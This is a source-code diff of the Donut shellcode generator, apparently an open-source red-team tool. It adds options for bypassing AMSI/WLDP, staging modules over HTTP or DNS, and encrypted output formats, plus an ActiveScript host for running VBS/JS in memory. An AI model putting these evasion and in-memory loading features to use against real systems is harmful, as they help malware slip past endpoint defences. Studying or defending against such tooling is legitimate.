28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef FORMAT_H
32 #define FORMAT_H
33
34 #include "donut.h"
35
36 #ifdef __cplusplus
37 extern "C" {
38 #endif
39
40 int base64_template(void *pic, uint32_t pic_len, FILE *fd);
41 int c_ruby_template(void *pic, uint32_t pic_len, FILE *fd);
42 int py_template(void *pic, uint32_t pic_len, FILE* fd);
43 int powershell_template(void *pic, uint32_t pic_len, FILE *fd);
44 int csharp_template(void *pic, uint32_t pic_len, FILE *fd);
45 int hex_template(void *pic, uint32_t pic_len, FILE *fd);
46
47 #ifdef __cplusplus
48 }
49 #endif
50
51 #endif
52
+5
-1
include/hash.h less more
3434 #include <stdint.h>
3535 #include <string.h>
3636
37 void *Memset (void *ptr, int value, size_t num);
37 void *Memset (void *ptr, int value, unsigned int num);
3838
3939 #define MARU_MAX_STR 64
4040 #define MARU_BLK_LEN 16
4444
4545 #ifndef ROTR32
4646 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
47 #endif
48
49 #ifndef ROTL32
50 #define ROTL32(v,n)(((v)<<(n))|((v)>>(32-(n))))
4751 #endif
4852
4953 #ifdef __cplusplus
+3
-4
include/mmap-windows.c less more
1212
1313 #include "mmap.h"
1414
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
15 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset)
1616 {
1717 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
1818 return MAP_FAILED;
5757 dwDesiredAccess |= FILE_MAP_COPY;
5858 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
5959 if (ret == NULL) {
60 CloseHandle(h);
6160 ret = MAP_FAILED;
6261 }
62 CloseHandle(h);
6363 return ret;
6464 }
6565
66 void munmap(void *addr, size_t length)
66 void munmap(void *addr, uint32_t length)
6767 {
6868 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
7069 }
7170
7271 #undef DWORD_HI
+2
-2
include/mmap.h less more
3434 extern "C" {
3535 #endif
3636
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
37 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, uint32_t length);
3939
4040 #ifdef __cplusplus
4141 }
+0
-16
include/wintypes.h less more
66
77 #ifndef __WIN_TYPES
88 #define __WIN_TYPES__
9
10 /*
11 #if _MSC_VER
12 #ifndef snprintf
13 #define snprintf _snprintf
14 #endif
15 #ifndef snscanf
16 #define snscanf _snscanf
17 #endif
18 #endif
19 */
209
2110 #ifdef _MSC_VER
2211 #include <stdint.h>
7766 typedef uint16_t WCHAR;
7867 #endif
7968
80 // this might be a problem..
81 #ifndef ULONG_PTR
82 typedef ULONGULONG *ULONG_PTR;
83 #endif
84
8569 #ifndef VOID
8670 #define VOID void
8771 typedef char CHAR;
lib/aplib32.a less more
Binary diff not shown
lib/aplib32.lib less more
Binary diff not shown
lib/aplib64.a less more
Binary diff not shown
lib/aplib64.lib less more
Binary diff not shown
+125
-60
lib/donut.h less more
3838 #include <sys/stat.h>
3939 #include <inttypes.h>
4040
41 #define DONUT_ERROR_SUCCESS 0
42 #define DONUT_ERROR_FILE_NOT_FOUND 1
43 #define DONUT_ERROR_FILE_EMPTY 2
44 #define DONUT_ERROR_FILE_ACCESS 3
45 #define DONUT_ERROR_FILE_INVALID 4
46 #define DONUT_ERROR_NET_PARAMS 5
47 #define DONUT_ERROR_NO_MEMORY 6
48 #define DONUT_ERROR_INVALID_ARCH 7
49 #define DONUT_ERROR_INVALID_URL 8
50 #define DONUT_ERROR_URL_LENGTH 9
51 #define DONUT_ERROR_INVALID_PARAMETER 10
52 #define DONUT_ERROR_RANDOM 11
53 #define DONUT_ERROR_DLL_FUNCTION 12
54 #define DONUT_ERROR_ARCH_MISMATCH 13
55 #define DONUT_ERROR_DLL_PARAM 14
56 #define DONUT_ERROR_BYPASS_INVALID 15
41 #if defined(_WIN32) || defined(_WIN64)
42 #define WINDOWS
43 #include <windows.h>
44 #else
45 #define LINUX
46 #include <unistd.h>
47 #include <dlfcn.h>
48 #endif
49
50 #define DONUT_ERROR_SUCCESS 0
51 #define DONUT_ERROR_FILE_NOT_FOUND 1
52 #define DONUT_ERROR_FILE_EMPTY 2
53 #define DONUT_ERROR_FILE_ACCESS 3
54 #define DONUT_ERROR_FILE_INVALID 4
55 #define DONUT_ERROR_NET_PARAMS 5
56 #define DONUT_ERROR_NO_MEMORY 6
57 #define DONUT_ERROR_INVALID_ARCH 7
58 #define DONUT_ERROR_INVALID_URL 8
59 #define DONUT_ERROR_URL_LENGTH 9
60 #define DONUT_ERROR_INVALID_PARAMETER 10
61 #define DONUT_ERROR_RANDOM 11
62 #define DONUT_ERROR_DLL_FUNCTION 12
63 #define DONUT_ERROR_ARCH_MISMATCH 13
64 #define DONUT_ERROR_DLL_PARAM 14
65 #define DONUT_ERROR_BYPASS_INVALID 15
66 #define DONUT_ERROR_NORELOC 16
67 #define DONUT_ERROR_INVALID_ENCODING 17
68 #define DONUT_ERROR_INVALID_ENGINE 18
69 #define DONUT_ERROR_COMPRESSION 19
70 #define DONUT_ERROR_INVALID_ENTROPY 20
5771
5872 // target architecture
59 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
60 #define DONUT_ARCH_X86 1 // x86
61 #define DONUT_ARCH_X64 2 // AMD64
62 #define DONUT_ARCH_X84 3 // AMD64 + x86
73 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
74 #define DONUT_ARCH_X86 1 // x86
75 #define DONUT_ARCH_X64 2 // AMD64
76 #define DONUT_ARCH_X84 3 // AMD64 + x86
6377
6478 // module type
65 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
66 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
67 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
68 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
69 #define DONUT_MODULE_VBS 5 // VBScript
70 #define DONUT_MODULE_JS 6 // JavaScript or JScript
71 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
79 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
80 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
81 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
82 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
83 #define DONUT_MODULE_VBS 5 // VBScript
84 #define DONUT_MODULE_JS 6 // JavaScript or JScript
85
86 // format type
87 #define DONUT_FORMAT_BINARY 1
88 #define DONUT_FORMAT_BASE64 2
89 #define DONUT_FORMAT_RUBY 3
90 #define DONUT_FORMAT_C 4
91 #define DONUT_FORMAT_PYTHON 5
92 #define DONUT_FORMAT_POWERSHELL 6
93 #define DONUT_FORMAT_CSHARP 7
94 #define DONUT_FORMAT_HEX 8
95
96 // compression engine
97 #define DONUT_COMPRESS_NONE 1
98 #define DONUT_COMPRESS_APLIB 2
99 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
100 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
101 #define DONUT_COMPRESS_XPRESS_HUFF 5 // COMPRESSION_FORMAT_XPRESS_HUFF
102
103 // entropy level
104 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
105 #define DONUT_ENTROPY_RANDOM 2 // use random names
106 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
107
108 // misc options
109 #define DONUT_OPT_EXIT_THREAD 1 // return to the caller which calls RtlExitUserThread
110 #define DONUT_OPT_EXIT_PROCESS 2 // call RtlExitUserProcess to terminate host process
72111
73112 // instance type
74 #define DONUT_INSTANCE_PIC 1 // Self-contained
75 #define DONUT_INSTANCE_URL 2 // Download from remote server
113 #define DONUT_INSTANCE_EMBED 1 // Self-contained
114 #define DONUT_INSTANCE_HTTP 2 // Download from remote HTTP/HTTPS server
115 #define DONUT_INSTANCE_DNS 3 // Download from remote DNS server
76116
77117 // AMSI/WLDP options
78 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
79 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
80 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
118 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
119 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
120 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
81121
82 // apparently C# can support 2^16 or 65,536 parameters
83 // we support up to eight for now :)
84 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
85 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
86 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
87 #define DONUT_MAX_URL 256
88 #define DONUT_MAX_MODNAME 8
89 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
90 #define DONUT_VER_LEN 32
91 #define DONUT_DOMAIN_LEN 8
122 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
123 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
124 #define DONUT_MAX_MODNAME 8
125 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
126 #define DONUT_VER_LEN 32
127 #define DONUT_DOMAIN_LEN 8
92128
93129 typedef struct _DONUT_CONFIG {
94 int arch; // target architecture for shellcode
95 int bypass; // bypass option for AMSI/WDLP
96 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
97 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
98 char method[DONUT_MAX_NAME]; // name of method to execute
99 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
100 char file[DONUT_MAX_NAME]; // assembly to create module from
101 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
102 char runtime[DONUT_MAX_NAME]; // runtime version to use.
103 char modname[DONUT_MAX_NAME]; // name of module written to disk
130 uint32_t len, zlen; // original length of input file and compressed length
131 // general / misc options for loader
132 int arch; // target architecture
133 int bypass; // bypass option for AMSI/WDLP
134 int compress; // engine to use when compressing file via RtlCompressBuffer
135 int entropy; // entropy/encryption level
136 int format; // output format for loader
137 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
138 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
139 uint64_t oep; // original entrypoint of target host file
104140
105 int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL
106 uint64_t mod_len; // size of DONUT_MODULE
107 void *mod; // points to donut module
141 // files in/out
142 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
143 char output[DONUT_MAX_NAME]; // name of output file to save loader
108144
109 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
110 uint64_t inst_len; // size of DONUT_INSTANCE
111 void *inst; // points to donut instance
145 // .NET stuff
146 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
147 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
148 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
149 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
112150
113 uint64_t pic_len; // size of shellcode
114 void *pic; // points to PIC/shellcode
151 // command line for DLL/EXE
152 char param[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
153 int unicode; // param is converted to UNICODE before being passed to DLL function
154
155 // HTTP staging information
156 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote http server
157 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
158
159 // DONUT_MODULE
160 int mod_type; // VBS/JS/DLL/EXE
161 int mod_len; // size of DONUT_MODULE
162 void *mod; // points to DONUT_MODULE
163
164 // DONUT_INSTANCE
165 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_HTTP
166 int inst_len; // size of DONUT_INSTANCE
167 void *inst; // points to DONUT_INSTANCE
168
169 // shellcode generated from configuration
170 int pic_len; // size of loader/shellcode
171 void* pic; // points to loader/shellcode
115172 } DONUT_CONFIG, *PDONUT_CONFIG;
173
174 // function pointers
175 typedef int (__cdecl *DonutCreate_t)(PDONUT_CONFIG);
176 typedef int (__cdecl *DonutDelete_t)(PDONUT_CONFIG);
177 typedef const char* (__cdecl *DonutError_t)(int);
116178
117179 #ifdef __cplusplus
118180 extern "C" {
119181 #endif
120182
183 // prototypes
121184 int DonutCreate(PDONUT_CONFIG);
185 int DonutCreateWrapper(const char *);
122186 int DonutDelete(PDONUT_CONFIG);
187 const char* DonutError(int);
123188
124189 #ifdef __cplusplus
125190 }
+298
-0
loader/activescript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 #ifdef DEBUG
55 // try resolve interface name for IID
56 PWCHAR iid2interface(PWCHAR riid) {
57 LSTATUS s;
58 HKEY hk;
59 WCHAR subkey[128];
60 static WCHAR name[128];
61 DWORD len = ARRAYSIZE(name);
62
63 // check under HKEY_CLASSES_ROOT\Interface\ for name
64
65 swprintf(subkey, ARRAYSIZE(subkey), L"Interface\\%s", riid) ;
66
67 s = SHGetValueW(
68 HKEY_CLASSES_ROOT,
69 subkey,
70 NULL,
71 0,
72 name,
73 &len);
74
75 if(s != ERROR_SUCCESS) return L"Not found";
76
77 return name;
78 }
79 #endif
80
81 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
82 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
83
84 #ifdef DEBUG
85 OLECHAR *iid;
86 HRESULT hr;
87
88 hr = StringFromIID(riid, &iid);
89 if(hr == S_OK) {
90 DPRINT("IActiveScriptSite::QueryInterface(%ws (%ws))", iid, iid2interface(iid));
91 CoTaskMemFree(iid);
92 } else {
93 DPRINT("StringFromIID failed");
94 }
95 #endif
96
97 if(ppv == NULL) return E_POINTER;
98
99 // we implement the following interfaces
100 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
101 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
102 {
103 DPRINT("Returning interface to IActiveScriptSite");
104 *ppv = (LPVOID)this;
105 ActiveScript_AddRef(this);
106 return S_OK;
107 } else if(IsEqualIID(&mas->inst->xIID_IActiveScriptSiteWindow, riid)) {
108 DPRINT("Returning interface to IActiveScriptSiteWindow");
109 *ppv = (LPVOID)&mas->siteWnd;
110 ActiveScriptSiteWindow_AddRef(&mas->siteWnd);
111 return S_OK;
112 }
113 DPRINT("Returning E_NOINTERFACE");
114 *ppv = NULL;
115 return E_NOINTERFACE;
116 }
117
118 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
119 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
120
121 _InterlockedIncrement(&mas->site.m_cRef);
122
123 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
124
125 return mas->site.m_cRef;
126 }
127
128 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
129 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
130
131 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
132
133 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
134 return ulRefCount;
135 }
136
137 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
138 LPCOLESTR objectName, DWORD dwReturnMask,
139 IUnknown **objPtr, ITypeInfo **ppti)
140 {
141 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
142
143 DPRINT("IActiveScriptSite::GetItemInfo(objectName=%p, dwReturnMask=%08lx)",
144 objectName, dwReturnMask);
145
146 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
147 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
148 if(ppti == NULL) return E_POINTER;
149
150 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
151 *ppti = mas->wscript.lpTypeInfo;
152 }
153
154 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
155 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
156 if(objPtr == NULL) return E_POINTER;
157
158 mas->wscript.lpVtbl->AddRef(&mas->wscript);
159 *objPtr = (IUnknown*)&mas->wscript;
160 }
161
162 return S_OK;
163 }
164
165 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
166 IActiveScriptError *scriptError)
167 {
168 DPRINT("IActiveScriptSite::OnScriptError");
169
170 EXCEPINFO ei;
171 DWORD dwSourceContext = 0;
172 ULONG ulLineNumber = 0;
173 LONG ichCharPosition = 0;
174 HRESULT hr;
175
176 Memset(&ei, 0, sizeof(EXCEPINFO));
177
178 DPRINT("IActiveScriptError::GetExceptionInfo");
179 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
180 if(hr == S_OK) {
181 DPRINT("IActiveScriptError::GetSourcePosition");
182 hr = scriptError->lpVtbl->GetSourcePosition(
183 scriptError, &dwSourceContext,
184 &ulLineNumber, &ichCharPosition);
185 if(hr == S_OK) {
186 DPRINT("JSError: %ws line[%d:%d]\n",
187 ei.bstrDescription, ulLineNumber, ichCharPosition);
188 }
189 }
190 return S_OK;
191 }
192
193 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
194 DPRINT("IActiveScriptSite::GetLCID");
195 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
196
197 *plcid = mas->inst->api.GetUserDefaultLCID();
198 return S_OK;
199 }
200
201 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
202 DPRINT("IActiveScriptSite::GetDocVersionString");
203
204 return S_OK;
205 }
206
207 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
208 const VARIANT *pvr, const EXCEPINFO *pei)
209 {
210 DPRINT("IActiveScriptSite::OnScriptTerminate");
211
212 return S_OK;
213 }
214
215 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
216 DPRINT("IActiveScriptSite::OnStateChange");
217
218 return S_OK;
219 }
220
221 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
222 DPRINT("IActiveScriptSite::OnEnterScript");
223
224 return S_OK;
225 }
226
227 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
228 DPRINT("IActiveScriptSite::OnLeaveScript");
229
230 return S_OK;
231 }
232
233
234 // ################################################# IActiveScriptSiteWindow ###############################################
235
236 // initialize virtual function table for this interface
237 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this) {
238 // Initialize IUnknown
239 this->lpVtbl->QueryInterface = ADR(LPVOID, ActiveScriptSiteWindow_QueryInterface);
240 this->lpVtbl->AddRef = ADR(LPVOID, ActiveScriptSiteWindow_AddRef);
241 this->lpVtbl->Release = ADR(LPVOID, ActiveScriptSiteWindow_Release);
242
243 // Initialize IActiveScriptSiteWindow
244 this->lpVtbl->GetWindow = ADR(LPVOID, ActiveScriptSiteWindow_GetWindow);
245 this->lpVtbl->EnableModeless = ADR(LPVOID, ActiveScriptSiteWindow_EnableModeless);
246
247 this->m_cRef = 0;
248 this->inst = inst;
249 }
250
251 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv) {
252 OLECHAR *iid;
253 HRESULT hr;
254
255 DPRINT("ActiveScriptSiteWindow::QueryInterface");
256
257 if(ppv == NULL) return E_POINTER;
258
259 // we implement the following interfaces
260 if(IsEqualIID(&this->inst->xIID_IUnknown, riid) ||
261 IsEqualIID(&this->inst->xIID_IActiveScriptSiteWindow, riid))
262 {
263 DPRINT("Returning this interface");
264 *ppv = (LPVOID)this;
265 ActiveScriptSiteWindow_AddRef(this);
266 return S_OK;
267 }
268 DPRINT("Interface not supported");
269 *ppv = NULL;
270 return E_NOINTERFACE;
271 }
272
273 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this) {
274 _InterlockedIncrement(&this->m_cRef);
275
276 DPRINT("ActiveScriptSiteWindow::AddRef(%i)", this->m_cRef);
277
278 return this->m_cRef;
279 }
280
281 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this) {
282 ULONG ulRefCount = _InterlockedDecrement(&this->m_cRef);
283
284 DPRINT("ActiveScriptSiteWindow::Release(%i)", ulRefCount);
285
286 return ulRefCount;
287 }
288
289 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd) {
290 DPRINT("ActiveScriptSiteWindow::GetWindow(phwnd=%p)", phwnd);
291 return E_NOTIMPL;
292 }
293
294 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable) {
295 DPRINT("ActiveScriptSiteWindow::EnableModeless(fEnable=%ws)", fEnable ? L"FALSE" : L"TRUE");
296 return E_NOTIMPL;
297 }
+450
-0
loader/activescript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
